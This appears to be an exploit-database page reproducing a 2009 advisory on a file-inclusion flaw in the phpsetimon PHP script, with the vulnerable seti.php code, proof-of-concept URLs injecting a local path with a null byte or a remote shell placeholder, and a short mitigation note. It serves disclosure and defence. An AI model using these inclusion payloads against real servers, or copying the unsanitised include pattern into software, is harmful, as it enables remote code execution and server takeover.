header-logo
Suggest Exploit
vendor:
PHP SETI@home web monitor (phpsetimon)
by:
eidelweiss
9,3
CVSS
HIGH
Remote File Inclusion (RFI) and Local File Inclusion (LFI)
98
CWE
Product Name: PHP SETI@home web monitor (phpsetimon)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHP SETI@home web monitor (phpsetimon) RFI / LFI Vulnerability

The PHP SETI@home web monitor is vulnerable to both Remote File Inclusion (RFI) and Local File Inclusion (LFI) attacks. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request can contain a malicious file which can be included in the vulnerable script. This malicious file can be used to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. Additionally, the web server should be configured to only allow access to the files and directories that are necessary for the application to function.
Source

Exploit-DB raw data:

===========================================================================
PHP SETI@home web monitor (phpsetimon) RFI / LFI Vulnerability
===========================================================================

Home Page:	http://setiathome.ssl.berkeley.edu/
download:	http://www.mariovaldez.net/software/phpsetimon/
Author:		eidelweiss
Contact:	g1xsystem[at]windowslive.com

=====================================================================

Description:

The PHP SETI@home web monitor is a very simple PHP script to monitor single or multiple setiathome programs running in your workstation or server, via the local web server. 
If you don't know what is SETI@home, visit the SETI@home website. 

=====================================================================

	--=[ Vuln C0de ]=-

[-] path/seti.php

-----------------------------------------------------------------------------------------

require_once ("seticlients.inc.php");
require_once ("config.inc.php");

$ps_charset = "iso-8859-1";
if ($ps_cfg_language <> "")
  $ps_htmllang = "<meta http-equiv='Content-Type' content='text/html; charset=$ps_charset'>\n";
$ps_languages = array ("es" => 1, "en" => 1);
if (array_key_exists (strtolower ($ps_cfg_language), $ps_languages)) {
  $ps_cfg_language = strtolower ($ps_cfg_language);
  require_once ($ps_cfg_langfiles . $ps_cfg_language. ".inc.php");
}
else { $ps_cfg_language = "en"; include($ps_cfg_langfiles . "en.inc.php"); }

require_once ("seti_lib.inc.php");
require_once ("seti_data.inc.php");
require_once ("seti_graphs.inc.php");

-----------------------------------------------------------------------------------------

	-=[ P0C LFI ]=-

	http://127.0.0.1/path/seti.php?ps_cfg_langfiles= [LFI]%00
			
	-=[ P0C RFI ]=-

	http://127.0.0.1/path/seti.php?ps_cfg_langfiles= [inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |=========================